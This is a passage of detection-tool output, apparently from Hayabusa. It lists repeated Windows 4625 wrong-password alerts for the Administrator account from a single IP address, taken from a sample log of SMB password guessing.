| 1286 | 2016-09-20 01:50:34.997 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1287 | 2016-09-20 01:50:35.040 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1288 | 2016-09-20 01:50:35.081 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1289 | 2016-09-20 01:50:35.124 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1290 | 2016-09-20 01:50:35.169 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1291 | 2016-09-20 01:50:35.196 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1292 | 2016-09-20 01:50:35.234 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1293 | 2016-09-20 01:50:35.272 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1294 | 2016-09-20 01:50:35.316 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1295 | 2016-09-20 01:50:35.352 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1296 | 2016-09-20 01:50:35.397 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1297 | 2016-09-20 01:50:35.433 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1298 | 2016-09-20 01:50:35.465 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1299 | 2016-09-20 01:50:35.517 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1300 | 2016-09-20 01:50:35.562 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1301 | 2016-09-20 01:50:35.605 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1302 | 2016-09-20 01:50:35.645 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1303 | 2016-09-20 01:50:35.688 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1304 | 2016-09-20 01:50:35.724 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1305 | 2016-09-20 01:50:35.764 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1306 | 2016-09-20 01:50:35.805 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1307 | 2016-09-20 01:50:35.840 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1308 | 2016-09-20 01:50:35.873 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1309 | 2016-09-20 01:50:35.916 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1310 | 2016-09-20 01:50:35.947 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1311 | 2016-09-20 01:50:35.984 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1312 | 2016-09-20 01:50:36.016 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1313 | 2016-09-20 01:50:36.056 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1314 | 2016-09-20 01:50:36.101 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1315 | 2016-09-20 01:50:36.132 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1316 | 2016-09-20 01:50:36.181 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1317 | 2016-09-20 01:50:36.229 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1318 | 2016-09-20 01:50:36.276 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1319 | 2016-09-20 01:50:36.321 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1320 | 2016-09-20 01:50:36.357 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1321 | 2016-09-20 01:50:36.393 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1322 | 2016-09-20 01:50:36.427 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1323 | 2016-09-20 01:50:36.476 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1324 | 2016-09-20 01:50:36.518 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1325 | 2016-09-20 01:50:36.564 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1326 | 2016-09-20 01:50:36.600 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1327 | 2016-09-20 01:50:36.796 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1328 | 2016-09-20 01:50:36.833 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1329 | 2016-09-20 01:50:36.872 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1330 | 2016-09-20 01:50:36.908 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1331 | 2016-09-20 01:50:36.949 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1332 | 2016-09-20 01:50:36.988 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1333 | 2016-09-20 01:50:37.016 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1334 | 2016-09-20 01:50:37.056 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1335 | 2016-09-20 01:50:37.104 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1336 | 2016-09-20 01:50:37.149 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1337 | 2016-09-20 01:50:37.184 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1338 | 2016-09-20 01:50:37.224 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1339 | 2016-09-20 01:50:37.267 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1340 | 2016-09-20 01:50:37.306 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1341 | 2016-09-20 01:50:37.344 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1342 | 2016-09-20 01:50:37.384 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1343 | 2016-09-20 01:50:37.416 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1344 | 2016-09-20 01:50:37.464 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1345 | 2016-09-20 01:50:37.500 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1346 | 2016-09-20 01:50:37.544 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1347 | 2016-09-20 01:50:37.600 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1348 | 2016-09-20 01:50:37.640 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1349 | 2016-09-20 01:50:37.688 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1350 | 2016-09-20 01:50:37.731 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1351 | 2016-09-20 01:50:37.768 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1352 | 2016-09-20 01:50:37.804 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1353 | 2016-09-20 01:50:37.841 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1354 | 2016-09-20 01:50:37.884 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1355 | 2016-09-20 01:50:37.920 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
